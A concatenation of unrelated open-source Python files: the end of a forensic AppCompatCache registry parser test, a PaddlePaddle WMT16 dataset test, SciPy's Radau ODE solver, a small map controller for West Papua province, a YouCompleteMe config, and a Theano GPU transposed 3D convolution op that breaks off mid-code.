self.assertEqual(format_type, parser._FORMAT_TYPE_8)
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_10)
self.assertEqual(format_type, parser._FORMAT_TYPE_10)
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_10_CREATOR)
self.assertEqual(format_type, parser._FORMAT_TYPE_10)
# TODO: add bogus data tests.
def testParseHeader(self):
"""Tests the ParseHeader function."""
parser = appcompatcache.AppCompatCacheDataParser()
header_object = parser.ParseHeader(
parser._FORMAT_TYPE_XP, _CACHE_DATA_WINDOWS_XP)
self.assertIsNotNone(header_object)
header_object = parser.ParseHeader(
parser._FORMAT_TYPE_2003, _CACHE_DATA_WINDOWS_2003)
self.assertIsNotNone(header_object)
# TODO: fix Vista support.
# header_object = parser.ParseHeader(
# parser._FORMAT_TYPE_VISTA, _CACHE_DATA_WINDOWS_VISTA)
# self.assertIsNotNone(header_object)
# TODO: add Windows 7 test.
header_object = parser.ParseHeader(
parser._FORMAT_TYPE_8, _CACHE_DATA_WINDOWS_8_0)
self.assertIsNotNone(header_object)
header_object = parser.ParseHeader(
parser._FORMAT_TYPE_8, _CACHE_DATA_WINDOWS_8_1)
self.assertIsNotNone(header_object)
header_object = parser.ParseHeader(
parser._FORMAT_TYPE_10, _CACHE_DATA_WINDOWS_10)
self.assertIsNotNone(header_object)
# TODO: add bogus data tests.
class AppCompatCacheCollectorTest(test_lib.BaseTestCase):
"""Tests for the Application Compatibility Cache collector."""
def _CreateTestRegistry(self):
"""Creates Registry keys and values for testing.
Returns:
dfwinreg.WinRegistry: Windows Registry for testing.
"""
key_path_prefix = 'HKEY_LOCAL_MACHINE\\System'
registry_file = dfwinreg_fake.FakeWinRegistryFile(
key_path_prefix=key_path_prefix)
registry_key = dfwinreg_fake.FakeWinRegistryKey('Select')
registry_file.AddKeyByPath('\\', registry_key)
value_data = b'\x01\x00\x00\x00'
registry_value = dfwinreg_fake.FakeWinRegistryValue(
'Current', data=value_data, data_type=dfwinreg_definitions.REG_DWORD)
registry_key.AddValue(registry_value)
registry_key = dfwinreg_fake.FakeWinRegistryKey('AppCompatibility')
registry_file.AddKeyByPath(
'\\ControlSet001\\Control\\Session Manager', registry_key)
registry_value = dfwinreg_fake.FakeWinRegistryValue(
'AppCompatCache', data=_CACHE_DATA_WINDOWS_XP,
data_type=dfwinreg_definitions.REG_BINARY)
registry_key.AddValue(registry_value)
registry_file.Open(None)
registry = dfwinreg_registry.WinRegistry()
registry.MapFile(key_path_prefix, registry_file)
return registry
def testCollect(self):
"""Tests the Collect function."""
registry = self._CreateTestRegistry()
test_output_writer = TestOutputWriter()
collector_object = appcompatcache.AppCompatCacheCollector(
output_writer=test_output_writer)
result = collector_object.Collect(registry, all_control_sets=True)
self.assertTrue(result)
test_output_writer.Close()
self.assertEqual(len(collector_object.cached_entries), 1)
def testCollectEmpty(self):
"""Tests the Collect function on an empty Registry."""
registry = dfwinreg_registry.WinRegistry()
test_output_writer = TestOutputWriter()
collector_object = appcompatcache.AppCompatCacheCollector(
output_writer=test_output_writer)
result = collector_object.Collect(registry)
self.assertFalse(result)
test_output_writer.Close()
self.assertEqual(len(collector_object.cached_entries), 0)
if __name__ == '__main__':
unittest.main()
|
# Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.dataset.wmt16
import unittest
class TestWMT16(unittest.TestCase):
def checkout_one_sample(self, sample):
# train data has 3 field: source language word indices,
# target language word indices, and target next word indices.
self.assertEqual(len(sample), 3)
# test start mark and end mark in source word indices.
self.assertEqual(sample[0][0], 0)
self.assertEqual(sample[0][-1], 1)
# test start mask in target word indices
self.assertEqual(sample[1][0], 0)
# test en mask in target next word indices
self.assertEqual(sample[2][-1], 1)
def test_train(self):
for idx, sample in enumerate(
paddle.dataset.wmt16.train(
src_dict_size=100000, trg_dict_size=100000)()):
if idx >= 10: break
self.checkout_one_sample(sample)
def test_test(self):
for idx, sample in enumerate(
paddle.dataset.wmt16.test(
src_dict_size=1000, trg_dict_size=1000)()):
if idx >= 10: break
self.checkout_one_sample(sample)
def test_val(self):
for idx, sample in enumerate(
paddle.dataset.wmt16.validation(
src_dict_size=1000, trg_dict_size=1000)()):
if idx >= 10: break
self.checkout_one_sample(sample)
def test_get_dict(self):
dict_size = 1000
word_dict = paddle.dataset.wmt16.get_dict("en", dict_size, True)
self.assertEqual(len(word_dict), dict_size)
self.assertEqual(word_dict[0], "<s>")
self.assertEqual(word_dict[1], "<e>")
self.assertEqual(word_dict[2], "<unk>")
if __name__ == "__main__":
unittest.main()
|
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.linalg import lu_factor, lu_solve
from scipy.sparse import csc_matrix, issparse, eye
from scipy.sparse.linalg import splu
from scipy.optimize._numdiff import group_columns
from .common import (validate_max_step, validate_tol, select_initial_step,
norm, num_jac, EPS, warn_extraneous,
validate_first_step)
from .base import OdeSolver, DenseOutput
S6 = 6 ** 0.5
# Butcher tableau. A is not used directly, see below.
C = np.array([(4 - S6) / 10, (4 + S6) / 10, 1])
E = np.array([-13 - 7 * S6, -13 + 7 * S6, -1]) / 3
# Eigendecomposition of A is done: A = T L T**-1. There is 1 real eigenvalue
# and a complex conjugate pair. They are written below.
MU_REAL = 3 + 3 ** (2 / 3) - 3 ** (1 / 3)
MU_COMPLEX = (3 + 0.5 * (3 ** (1 / 3) - 3 ** (2 / 3))
- 0.5j * (3 ** (5 / 6) + 3 ** (7 / 6)))
# These are transformation matrices.
T = np.array([
[0.09443876248897524, -0.14125529502095421, 0.03002919410514742],
[0.25021312296533332, 0.20412935229379994, -0.38294211275726192],
[1, 1, 0]])
TI = np.array([
[4.17871859155190428, 0.32768282076106237, 0.52337644549944951],
[-4.17871859155190428, -0.32768282076106237, 0.47662355450055044],
[0.50287263494578682, -2.57192694985560522, 0.59603920482822492]])
# These linear combinations are used in the algorithm.
TI_REAL = TI[0]
TI_COMPLEX = TI[1] + 1j * TI[2]
# Interpolator coefficients.
P = np.array([
[13/3 + 7*S6/3, -23/3 - 22*S6/3, 10/3 + 5 * S6],
[13/3 - 7*S6/3, -23/3 + 22*S6/3, 10/3 - 5 * S6],
[1/3, -8/3, 10/3]])
NEWTON_MAXITER = 6 # Maximum number of Newton iterations.
MIN_FACTOR = 0.2 # Minimum allowed decrease in a step size.
MAX_FACTOR = 10 # Maximum allowed increase in a step size.
def solve_collocation_system(fun, t, y, h, Z0, scale, tol,
LU_real, LU_complex, solve_lu):
"""Solve the collocation system.
Parameters
----------
fun : callable
Right-hand side of the system.
t : float
Current time.
y : ndarray, shape (n,)
Current state.
h : float
Step to try.
Z0 : ndarray, shape (3, n)
Initial guess for the solution. It determines new values of `y` at
``t + h * C`` as ``y + Z0``, where ``C`` is the Radau method constants.
scale : float
Problem tolerance scale, i.e. ``rtol * abs(y) + atol``.
tol : float
Tolerance to which solve the system. This value is compared with
the normalized by `scale` error.
LU_real, LU_complex
LU decompositions of the system Jacobians.
solve_lu : callable
Callable which solves a linear system given a LU decomposition. The
signature is ``solve_lu(LU, b)``.
Returns
-------
converged : bool
Whether iterations converged.
n_iter : int
Number of completed iterations.
Z : ndarray, shape (3, n)
Found solution.
rate : float
The rate of convergence.
"""
n = y.shape[0]
M_real = MU_REAL / h
M_complex = MU_COMPLEX / h
W = TI.dot(Z0)
Z = Z0
F = np.empty((3, n))
ch = h * C
dW_norm_old = None
dW = np.empty_like(W)
converged = False
for k in range(NEWTON_MAXITER):
for i in range(3):
F[i] = fun(t + ch[i], y + Z[i])
if not np.all(np.isfinite(F)):
break
f_real = F.T.dot(TI_REAL) - M_real * W[0]
f_complex = F.T.dot(TI_COMPLEX) - M_complex * (W[1] + 1j * W[2])
dW_real = solve_lu(LU_real, f_real)
dW_complex = solve_lu(LU_complex, f_complex)
dW[0] = dW_real
dW[1] = dW_complex.real
dW[2] = dW_complex.imag
dW_norm = norm(dW / scale)
if dW_norm_old is not None:
rate = dW_norm / dW_norm_old
else:
rate = None
if (rate is not None and (rate >= 1 or
rate ** (NEWTON_MAXITER - k) / (1 - rate) * dW_norm > tol)):
break
W += dW
Z = T.dot(W)
if (dW_norm == 0 or
rate is not None and rate / (1 - rate) * dW_norm < tol):
converged = True
break
dW_norm_old = dW_norm
return converged, k + 1, Z, rate
def predict_factor(h_abs, h_abs_old, error_norm, error_norm_old):
"""Predict by which factor to increase/decrease the step size.
The algorithm is described in [1]_.
Parameters
----------
h_abs, h_abs_old : float
Current and previous values of the step size, `h_abs_old` can be None
(see Notes).
error_norm, error_norm_old : float
Current and previous values of the error norm, `error_norm_old` can
be None (see Notes).
Returns
-------
factor : float
Predicted factor.
Notes
-----
If `h_abs_old` and `error_norm_old` are both not None then a two-step
algorithm is used, otherwise a one-step algorithm is used.
References
----------
.. [1] E. Hairer, S. P. Norsett G. Wanner, "Solving Ordinary Differential
Equations II: Stiff and Differential-Algebraic Problems", Sec. IV.8.
"""
if error_norm_old is None or h_abs_old is None or error_norm == 0:
multiplier = 1
else:
multiplier = h_abs / h_abs_old * (error_norm_old / error_norm) ** 0.25
with np.errstate(divide='ignore'):
factor = min(1, multiplier) * error_norm ** -0.25
return factor
class Radau(OdeSolver):
"""Implicit Runge-Kutta method of Radau IIA family of order 5.
The implementation follows [1]_. The error is controlled with a
third-order accurate embedded formula. A cubic polynomial which satisfies
the collocation conditions is used for the dense output.
Parameters
----------
fun : callable
Right-hand side of the system. The calling signature is ``fun(t, y)``.
Here ``t`` is a scalar, and there are two options for the ndarray ``y``:
It can either have shape (n,); then ``fun`` must return array_like with
shape (n,). Alternatively it can have shape (n, k); then ``fun``
must return an array_like with shape (n, k), i.e. each column
corresponds to a single column in ``y``. The choice between the two
options is determined by `vectorized` argument (see below). The
vectorized implementation allows a faster approximation of the Jacobian
by finite differences (required for this solver).
t0 : float
Initial time.
y0 : array_like, shape (n,)
Initial state.
t_bound : float
Boundary time - the integration won't continue beyond it. It also
determines the direction of the integration.
first_step : float or None, optional
Initial step size. Default is ``None`` which means that the algorithm
should choose.
max_step : float, optional
Maximum allowed step size. Default is np.inf, i.e. the step size is not
bounded and determined solely by the solver.
rtol, atol : float and array_like, optional
Relative and absolute tolerances. The solver keeps the local error
estimates less than ``atol + rtol * abs(y)``. Here `rtol` controls a
relative accuracy (number of correct digits). But if a component of `y`
is approximately below `atol`, the error only needs to fall within
the same `atol` threshold, and the number of correct digits is not
guaranteed. If components of y have different scales, it might be
beneficial to set different `atol` values for different components by
passing array_like with shape (n,) for `atol`. Default values are
1e-3 for `rtol` and 1e-6 for `atol`.
jac : {None, array_like, sparse_matrix, callable}, optional
Jacobian matrix of the right-hand side of the system with respect to
y, required by this method. The Jacobian matrix has shape (n, n) and
its element (i, j) is equal to ``d f_i / d y_j``.
There are three ways to define the Jacobian:
* If array_like or sparse_matrix, the Jacobian is assumed to
be constant.
* If callable, the Jacobian is assumed to depend on both
t and y; it will be called as ``jac(t, y)`` as necessary.
For the 'Radau' and 'BDF' methods, the return value might be a
sparse matrix.
* If None (default), the Jacobian will be approximated by
finite differences.
It is generally recommended to provide the Jacobian rather than
relying on a finite-difference approximation.
jac_sparsity : {None, array_like, sparse matrix}, optional
Defines a sparsity structure of the Jacobian matrix for a
finite-difference approximation. Its shape must be (n, n). This argument
is ignored if `jac` is not `None`. If the Jacobian has only few non-zero
elements in *each* row, providing the sparsity structure will greatly
speed up the computations [2]_. A zero entry means that a corresponding
element in the Jacobian is always zero. If None (default), the Jacobian
is assumed to be dense.
vectorized : bool, optional
Whether `fun` is implemented in a vectorized fashion. Default is False.
Attributes
----------
n : int
Number of equations.
status : string
Current status of the solver: 'running', 'finished' or 'failed'.
t_bound : float
Boundary time.
direction : float
Integration direction: +1 or -1.
t : float
Current time.
y : ndarray
Current state.
t_old : float
Previous time. None if no steps were made yet.
step_size : float
Size of the last successful step. None if no steps were made yet.
nfev : int
Number of evaluations of the right-hand side.
njev : int
Number of evaluations of the Jacobian.
nlu : int
Number of LU decompositions.
References
----------
.. [1] E. Hairer, G. Wanner, "Solving Ordinary Differential Equations II:
Stiff and Differential-Algebraic Problems", Sec. IV.8.
.. [2] A. Curtis, M. J. D. Powell, and J. Reid, "On the estimation of
sparse Jacobian matrices", Journal of the Institute of Mathematics
and its Applications, 13, pp. 117-120, 1974.
"""
def __init__(self, fun, t0, y0, t_bound, max_step=np.inf,
rtol=1e-3, atol=1e-6, jac=None, jac_sparsity=None,
vectorized=False, first_step=None, **extraneous):
warn_extraneous(extraneous)
super(Radau, self).__init__(fun, t0, y0, t_bound, vectorized)
self.y_old = None
self.max_step = validate_max_step(max_step)
self.rtol, self.atol = validate_tol(rtol, atol, self.n)
self.f = self.fun(self.t, self.y)
# Select initial step assuming the same order which is used to control
# the error.
if first_step is None:
self.h_abs = select_initial_step(
self.fun, self.t, self.y, self.f, self.direction,
3, self.rtol, self.atol)
else:
self.h_abs = validate_first_step(first_step, t0, t_bound)
self.h_abs_old = None
self.error_norm_old = None
self.newton_tol = max(10 * EPS / rtol, min(0.03, rtol ** 0.5))
self.sol = None
self.jac_factor = None
self.jac, self.J = self._validate_jac(jac, jac_sparsity)
if issparse(self.J):
def lu(A):
self.nlu += 1
return splu(A)
def solve_lu(LU, b):
return LU.solve(b)
I = eye(self.n, format='csc')
else:
def lu(A):
self.nlu += 1
return lu_factor(A, overwrite_a=True)
def solve_lu(LU, b):
return lu_solve(LU, b, overwrite_b=True)
I = np.identity(self.n)
self.lu = lu
self.solve_lu = solve_lu
self.I = I
self.current_jac = True
self.LU_real = None
self.LU_complex = None
self.Z = None
def _validate_jac(self, jac, sparsity):
t0 = self.t
y0 = self.y
if jac is None:
if sparsity is not None:
if issparse(sparsity):
sparsity = csc_matrix(sparsity)
groups = group_columns(sparsity)
sparsity = (sparsity, groups)
def jac_wrapped(t, y, f):
self.njev += 1
J, self.jac_factor = num_jac(self.fun_vectorized, t, y, f,
self.atol, self.jac_factor,
sparsity)
return J
J = jac_wrapped(t0, y0, self.f)
elif callable(jac):
J = jac(t0, y0)
self.njev = 1
if issparse(J):
J = csc_matrix(J)
def jac_wrapped(t, y, _=None):
self.njev += 1
return csc_matrix(jac(t, y), dtype=float)
else:
J = np.asarray(J, dtype=float)
def jac_wrapped(t, y, _=None):
self.njev += 1
return np.asarray(jac(t, y), dtype=float)
if J.shape != (self.n, self.n):
raise ValueError("`jac` is expected to have shape {}, but "
"actually has {}."
.format((self.n, self.n), J.shape))
else:
if issparse(jac):
J = csc_matrix(jac)
else:
J = np.asarray(jac, dtype=float)
if J.shape != (self.n, self.n):
raise ValueError("`jac` is expected to have shape {}, but "
"actually has {}."
.format((self.n, self.n), J.shape))
jac_wrapped = None
return jac_wrapped, J
def _step_impl(self):
t = self.t
y = self.y
f = self.f
max_step = self.max_step
atol = self.atol
rtol = self.rtol
min_step = 10 * np.abs(np.nextafter(t, self.direction * np.inf) - t)
if self.h_abs > max_step:
h_abs = max_step
h_abs_old = None
error_norm_old = None
elif self.h_abs < min_step:
h_abs = min_step
h_abs_old = None
error_norm_old = None
else:
h_abs = self.h_abs
h_abs_old = self.h_abs_old
error_norm_old = self.error_norm_old
J = self.J
LU_real = self.LU_real
LU_complex = self.LU_complex
current_jac = self.current_jac
jac = self.jac
rejected = False
step_accepted = False
message = None
while not step_accepted:
if h_abs < min_step:
return False, self.TOO_SMALL_STEP
h = h_abs * self.direction
t_new = t + h
if self.direction * (t_new - self.t_bound) > 0:
t_new = self.t_bound
h = t_new - t
h_abs = np.abs(h)
if self.sol is None:
Z0 = np.zeros((3, y.shape[0]))
else:
Z0 = self.sol(t + h * C).T - y
scale = atol + np.abs(y) * rtol
converged = False
while not converged:
if LU_real is None or LU_complex is None:
LU_real = self.lu(MU_REAL / h * self.I - J)
LU_complex = self.lu(MU_COMPLEX / h * self.I - J)
converged, n_iter, Z, rate = solve_collocation_system(
self.fun, t, y, h, Z0, scale, self.newton_tol,
LU_real, LU_complex, self.solve_lu)
if not converged:
if current_jac:
break
J = self.jac(t, y, f)
current_jac = True
LU_real = None
LU_complex = None
if not converged:
h_abs *= 0.5
LU_real = None
LU_complex = None
continue
y_new = y + Z[-1]
ZE = Z.T.dot(E) / h
error = self.solve_lu(LU_real, f + ZE)
scale = atol + np.maximum(np.abs(y), np.abs(y_new)) * rtol
error_norm = norm(error / scale)
safety = 0.9 * (2 * NEWTON_MAXITER + 1) / (2 * NEWTON_MAXITER
+ n_iter)
if rejected and error_norm > 1:
error = self.solve_lu(LU_real, self.fun(t, y + error) + ZE)
error_norm = norm(error / scale)
if error_norm > 1:
factor = predict_factor(h_abs, h_abs_old,
error_norm, error_norm_old)
h_abs *= max(MIN_FACTOR, safety * factor)
LU_real = None
LU_complex = None
rejected = True
else:
step_accepted = True
recompute_jac = jac is not None and n_iter > 2 and rate > 1e-3
factor = predict_factor(h_abs, h_abs_old, error_norm, error_norm_old)
factor = min(MAX_FACTOR, safety * factor)
if not recompute_jac and factor < 1.2:
factor = 1
else:
LU_real = None
LU_complex = None
f_new = self.fun(t_new, y_new)
if recompute_jac:
J = jac(t_new, y_new, f_new)
current_jac = True
elif jac is not None:
current_jac = False
self.h_abs_old = self.h_abs
self.error_norm_old = error_norm
self.h_abs = h_abs * factor
self.y_old = y
self.t = t_new
self.y = y_new
self.f = f_new
self.Z = Z
self.LU_real = LU_real
self.LU_complex = LU_complex
self.current_jac = current_jac
self.J = J
self.t_old = t
self.sol = self._compute_dense_output()
return step_accepted, message
def _compute_dense_output(self):
Q = np.dot(self.Z.T, P)
return RadauDenseOutput(self.t_old, self.t, self.y_old, Q)
def _dense_output_impl(self):
return self.sol
class RadauDenseOutput(DenseOutput):
def __init__(self, t_old, t, y_old, Q):
super(RadauDenseOutput, self).__init__(t_old, t)
self.h = t - t_old
self.Q = Q
self.order = Q.shape[1] - 1
self.y_old = y_old
def _call_impl(self, t):
x = (t - self.t_old) / self.h
if t.ndim == 0:
p = np.tile(x, self.order + 1)
p = np.cumprod(p)
else:
p = np.tile(x, (self.order + 1, 1))
p = np.cumprod(p, axis=0)
# Here we don't multiply by h, not a mistake.
y = np.dot(self.Q, p)
if y.ndim == 2:
y += self.y_old[:, None]
else:
y += self.y_old
return y
|
import sys
sys.path.append('../../')
from lib.cilok import urlEncode16,tokenuri,setTTL,keyuri
from lib.sampeu import getWMTS
from apps.models import calendar
from apps.templates import batik
class Controller(object):
def home(self,uridt='null'):
provinsi = 'pabar'
provloc = '132.747602, -2.303933'
mapzoom = '8'
kabkotcord = [
'132.273454, -2.875830',
'134.089396, -3.529163',
'134.410378, -2.965049',
'133.272067, -1.872531',
'133.701069, -1.206365',#Manokwari
'132.206084, -1.733357',
'131.562871, -1.137346',#sorong
'130.883917, -1.035028',
'132.408301, -0.649349',
'132.293779, -1.286889',
'134.003835, -1.588732',#mS
'133.885090, -0.795815',#manokcity
'131.277227, -0.838014'#sorong
]
listkabkot = [
'%9101%','%9102%','%9103%','%9104%','%9105%','%9106%','%9107%','%9108%','%9109%','%9110%',
'%9111%','%9112%',
'%9171%'
]
batik.provinsi(provinsi,listkabkot,provloc,mapzoom,kabkotcord)
cal = calendar.Calendar()
dt = {}
for kabkot in listkabkot:
dt[kabkot]=cal.getYearCountKabKot(str(int(kabkot[1:3])),str(int(kabkot[3:5])),uridt)
cal.close()
dt['%WMTS%']=getWMTS()
dt['%PERIODE%']=uridt
dt['%LAMAN INDONESIA%']=urlEncode16(keyuri+'%peta%home'+'%'+uridt)
dt['%TAHUN SEBELUMNYA%']=urlEncode16(keyuri+'%'+provinsi+'%home'+'%'+str(int(uridt)-1))
dt['%TAHUN SETELAHNYA%']=urlEncode16(keyuri+'%'+provinsi+'%home'+'%'+str(int(uridt)+1))
return dt
|
# Generated by YCM Generator at 2019-11-01 00:52:51.366837
# This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import ycm_core
flags = [
'-x',
'c++',
'-I../../utils/',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.C', '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.H', '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
|
from __future__ import print_function
import numpy
import theano.tensor as T
from theano.misc import strutil
import theano
from six.moves import xrange
from theano.tensor.nnet.ConvTransp3D import ConvTransp3D
from theano.gof import local_optimizer
from theano.sandbox.cuda.basic_ops import as_cuda_ndarray_variable
from theano.sandbox.cuda.opt import gpu_optimizer
from theano.sandbox.cuda import (CudaNdarrayType, HostFromGpu,
host_from_gpu, GpuOp)
class GpuConvTransp3D(GpuOp):
"""
The gpu version of ConvTransp3D.
"""
def __eq__(self, other):
return type(self) == type(other)
def __hash__(self):
return hash(type(self))
def make_node(self, W, b, d, H, RShape=None):
W_ = as_cuda_ndarray_variable(W)
b_ = as_cuda_ndarray_variable(b)
d_ = T.as_tensor_variable(d)
H_ = as_cuda_ndarray_variable(H)
if RShape:
RShape_ = T.as_tensor_variable(RShape)
else:
RShape_ = T.as_tensor_variable([-1, -1, -1])
return theano.Apply(self, inputs=[W_, b_, d_, H_, RShape_],
outputs=[CudaNdarrayType(dtype=H_.dtype,
broadcastable=(False,)*5)()])
def infer_shape(self, node, input_shapes):
W, b, d, H, RShape = node.inputs
W_shape, b_shape, d_shape, H_shape, RShape_shape = input_shapes
return [(H_shape[0], W_shape[1], RShape[0], RShape[1], RShape[2])]
def perform_(self, node, inputs, output_storage):
W, b, d, H, RShape = inputs
print("\t\t\t\tGpuConvTransp3D python code still uses old format")
output_storage[0][0] = computeR(W, b, d, H, RShape)
def c_code_cache_version(self):
return ()
def c_code(self, node, nodename, inputs, outputs, sub):
W, b, d, H, RShape = inputs
fail = sub['fail']
R = outputs[0]
codeSource = """
///////////// < code generated by GpuConvTransp3D >
//printf("\t\t\t\tGpuConvTransp c code\\n");
//Check dimensionality of inputs
if (CudaNdarray_NDIM(%(H)s) != 5)
{
PyErr_Format(PyExc_ValueError, "GpuConvTransp3D: H must be a 5-D tensor but it is %%i-D", CudaNdarray_NDIM(%(H)s));
%(fail)s
}
if (CudaNdarray_NDIM(%(W)s) != 5)
{
PyErr_Format(PyExc_ValueError, "GpuConvTransp3D: W must be a 5-D tensor");
%(fail)s
}
if (CudaNdarray_NDIM(%(b)s) != 1)
{
PyErr_Format(PyExc_ValueError, "GpuConvTransp3D: b must be a vector");
%(fail)s
}
if (PyArray_NDIM(%(d)s) != 1)
{
PyErr_Format(PyExc_ValueError, "GpuConvTransp3D: d must be a vector");
%(fail)s
}
//Read and check stride arguments
if (PyArray_DIMS(%(d)s)[0] != 3)
{
PyErr_Format(PyExc_ValueError,"GpuConvTransp3D: 3 stride length arguments expected (for row, col, and time) but %%li were given", PyArray_DIMS(%(d)s)[0]);
%(fail)s
}
{ // for fail
const int dr = *(dtype_%(d)s*)PyArray_GETPTR1(%(d)s,0);
const int dc = *(dtype_%(d)s*)PyArray_GETPTR1(%(d)s,1);
const int dt = *(dtype_%(d)s*)PyArray_GETPTR1(%(d)s,2);
if (dr <= 0 || dc <= 0 || dt <= 0)
{
PyErr_Format(PyExc_ValueError, "GpuConvTransp3D: Strides must all be positive but are %%i, %%i, %%i",dr,dc,dt);
%(fail)s
}
//Read and check sizes of inputs
{ // for fail
const int batchSize = CudaNdarray_HOST_DIMS(%(H)s)[0];
const int outputChannels = CudaNdarray_HOST_DIMS(%(W)s)[0];
if (CudaNdarray_HOST_DIMS(%(H)s)[4] != outputChannels)
{
PyErr_Format(PyExc_ValueError, "W produces a %%i channel image but the image has %%i channels. W.shape: (%%i, %%i, %%i,%%i, %%i) H.shape: (%%i, %%i, %%i, %%i, %%i)",outputChannels,CudaNdarray_HOST_DIMS(%(H)s)[4], CudaNdarray_HOST_DIMS(%(W)s)[0], CudaNdarray_HOST_DIMS(%(W)s)[1], CudaNdarray_HOST_DIMS(%(W)s)[2], CudaNdarray_HOST_DIMS(%(W)s)[3], CudaNdarray_HOST_DIMS(%(W)s)[4], CudaNdarray_HOST_DIMS(%(H)s)[0], CudaNdarray_HOST_DIMS(%(H)s)[1], CudaNdarray_HOST_DIMS(%(H)s)[2], CudaNdarray_HOST_DIMS(%(H)s)[3], CudaNdarray_HOST_DIMS(%(H)s)[4]);
%(fail)s
}
{ // for fail
const int inputChannels = CudaNdarray_HOST_DIMS(%(W)s)[4];
if (CudaNdarray_HOST_DIMS(%(b)s)[0] != inputChannels)
{
PyErr_Format(PyExc_ValueError, "ConvTransp3D: b operates on a %%i channel image but the image has %%i channels", CudaNdarray_HOST_DIMS(%(b)s)[0], inputChannels );
%(fail)s
}
{ // for fail
const int filterHeight = CudaNdarray_HOST_DIMS(%(W)s)[1];
const int filterWidth = CudaNdarray_HOST_DIMS(%(W)s)[2];
const int filterDur = CudaNdarray_HOST_DIMS(%(W)s)[3];
const int outputHeight = CudaNdarray_HOST_DIMS(%(H)s)[1];
const int outputWidth = CudaNdarray_HOST_DIMS(%(H)s)[2];
const int outputDur = CudaNdarray_HOST_DIMS(%(H)s)[3];
int videoHeight = (outputHeight-1) * dr + filterHeight;
int videoWidth = (outputWidth-1) * dc + filterWidth;
int videoDur = (outputDur-1) * dt + filterDur;
if (%(RShape)s)
{
if (PyArray_NDIM(%(RShape)s) != 1)
{
PyErr_Format(PyExc_ValueError, "RShape must be a vector");
%(fail)s
}
if (PyArray_DIMS(%(RShape)s)[0] != 3)
{
PyErr_Format(PyExc_ValueError, "RShape must specify a 3D shape ( [height,width,duration] )");
%(fail)s
}
{ // for fail
dtype_%(RShape)s RShape0 = *(dtype_%(RShape)s*)PyArray_GETPTR1(%(RShape)s,0);
dtype_%(RShape)s RShape1 = *(dtype_%(RShape)s*)PyArray_GETPTR1(%(RShape)s,1);
dtype_%(RShape)s RShape2 = *(dtype_%(RShape)s*)PyArray_GETPTR1(%(RShape)s,2);
if (RShape0 != -1)
{
if (RShape0 < videoHeight || RShape1 < videoWidth || RShape2 < videoDur)
{
